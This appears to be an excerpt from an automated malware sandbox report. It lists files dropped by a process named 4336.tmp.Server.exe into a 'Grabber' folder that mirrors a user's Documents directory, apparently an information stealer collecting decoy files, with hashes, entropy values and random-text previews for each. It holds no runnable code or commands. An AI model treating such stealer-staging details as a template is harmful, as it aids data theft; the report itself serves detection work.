SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Reputation:	unknown
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\WUTJSCBCFX.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.688284131239007
Encrypted:	false
SSDEEP:	24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
MD5:	E8ACCA0F46CBA97FE289855535184C72
SHA1:	059878D0B535AEE9092BF82886FC68DC816D9F08
SHA-256:	CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
SHA-512:	185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
Malicious:	false
Reputation:	unknown
Preview:	WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Reputation:	unknown
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\3f9e073e7640535ca31a09fed4e39f55\user@134349_en-CH\Grabber\DRIVE-C\Users\user\Documents\XZXHAVGRAG\VLZDGUKUTZ.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
